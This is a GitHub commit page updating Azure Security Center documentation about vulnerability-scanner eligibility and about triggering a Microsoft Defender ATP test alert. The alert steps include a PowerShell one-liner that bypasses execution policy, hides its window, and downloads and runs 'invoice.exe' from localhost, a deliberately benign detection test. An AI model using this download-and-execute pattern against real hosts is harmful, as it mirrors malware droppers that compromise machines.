Skip to content

Commit 9c2f71b

Browse files
authored
Merge pull request #105795 from memildin/asc-melvyn-vmva
More on why a VM's in the "Not applicable resources" tab
2 parents 96bce3a + 31c003f commit 9c2f71b

File tree

2 files changed

+9
-5
lines changed

2 files changed

+9
-5
lines changed

articles/security-center/built-in-vulnerability-assessment.md

Lines changed: 5 additions & 3 deletions
Original file line numberDiff line numberDiff line change
@@ -38,8 +38,9 @@ To deploy the vulnerability scanner extension:
3838

3939
* **Healthy resources** – the vulnerability scanner extension has been deployed to these VMs.
4040
* **Unhealthy resources** – the vulnerability scanner extension can be deployed to these VMs.
41-
* **Not applicable resources** – these VMs can’t have the vulnerability scanner extension deployed. Your VM might be in this tab because it's on the free pricing tier, or it's not running one of the supported OSes:
42-
41+
* **Not applicable resources** – these VMs can’t have the vulnerability scanner extension deployed. Your VM might be in this tab because it's on the free pricing tier, it's missing the ImageReference class (relevant to custom images and VMs restored from backup, as explained in the Azure for .NET documentation](https://docs.microsoft.com/dotnet/api/microsoft.azure.batch.imagereference?view=azure-dotnet), or it's not running one of the supported OSes:
42+
43+
- All versions of Windows
4344
- Red Hat Enterprise Linux 6.7, 7.6
4445
- Ubuntu 14.04, 18.04
4546
- CentOS 6.10, 7, 7.6
@@ -134,8 +135,9 @@ When you open the recommendation, you'll see your VMs in one or more of the foll
134135

135136
- **Healthy resources** – the vulnerability scanner extension has been deployed to these VMs.
136137
- **Unhealthy resources** – the vulnerability scanner extension can be deployed to these VMs.
137-
- **Not applicable resources** – These VMs can’t have the vulnerability scanner extension deployed. Your VM might be in this tab because it's on the free pricing tier, or it's not running one of the supported OSes:
138+
- **Not applicable resources** – These VMs can’t have the vulnerability scanner extension deployed. Your VM might be in this tab because it's on the free pricing tier, it's missing the ImageReference class (relevant to custom images and VMs restored from backup, as explained in the Azure for .NET documentation](https://docs.microsoft.com/dotnet/api/microsoft.azure.batch.imagereference?view=azure-dotnet), or it's not running one of the supported OSes:
138139

140+
- All versions of Windows
139141
- Red Hat Enterprise Linux 6.7, 7.6
140142
- Ubuntu 14.04, 18.04
141143
- CentOS 6.10, 7, 7.6

articles/security-center/security-center-wdatp.md

Lines changed: 4 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -89,9 +89,11 @@ If you have a proxy or firewall that is blocking anonymous traffic, as a Microso
8989

9090
To generate a benign Microsoft Defender ATP test alert:
9191

92-
1. Use Remote Desktop to access either a Windows Server 2012 R2 VM or a Windows Server 2016 VM. Open a Command Prompt window.
92+
1. Create a folder 'C:\test-WDATP-test'.
9393

94-
2. At the prompt, copy and run the following command. The Command Prompt window will close automatically.
94+
1. Use Remote Desktop to access either a Windows Server 2012 R2 VM or a Windows Server 2016 VM. Open a command line window.
95+
96+
1. At the prompt, copy and run the following command. The Command Prompt window will close automatically.
9597

9698
```
9799
powershell.exe -NoExit -ExecutionPolicy Bypass -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile('http://127.0.0.1/1.exe', 'C:\\test-WDATP-test\\invoice.exe'); Start-Process 'C:\\test-WDATP-test\\invoice.exe'

0 commit comments

Comments
 (0)